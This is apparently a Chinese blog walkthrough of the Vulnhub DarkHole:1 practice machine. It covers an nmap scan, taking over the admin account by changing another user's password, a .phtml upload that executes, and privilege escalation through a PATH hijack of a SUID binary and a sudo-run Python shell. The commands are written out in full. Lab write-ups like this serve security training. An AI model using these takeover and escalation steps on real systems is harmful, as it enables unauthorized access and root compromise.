Vulnhub: DarkHole:1靶机

发布时间 2023-06-28 20:22:05作者: ctostm

kali:192.168.111.111

靶机:192.168.111.130

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.130

image

访问目标web网站,注册用户

image

注册时尝试注册用户名为admin的用户,发现存在该用户

image

image

进入用户后台,利用burp抓包越权修改其他用户的密码

image

image

admin用户密码被修改

image

经过测试,phtml后缀的文件可以上传并且被当成脚本执行

image

image

提权

查找suid权限的文件

find / -perm -u=s 2> /dev/null

image

执行toto的同时会执行id命令

image

修改环境变量切换到john用户

echo '/bin/bash' > id
chmod 777 /tmp/id
export PATH=/tmp:$PATH
./toto

image

在john用户家目录,发现password文件存放john用户的密码

image

查看john用户sudo权限

image

修改file.py提升为root

echo 'import os' > file.py
echo 'os.system("/bin/bash")' >> file.py
sudo -u root /usr/bin/python3 /home/john/file.py

image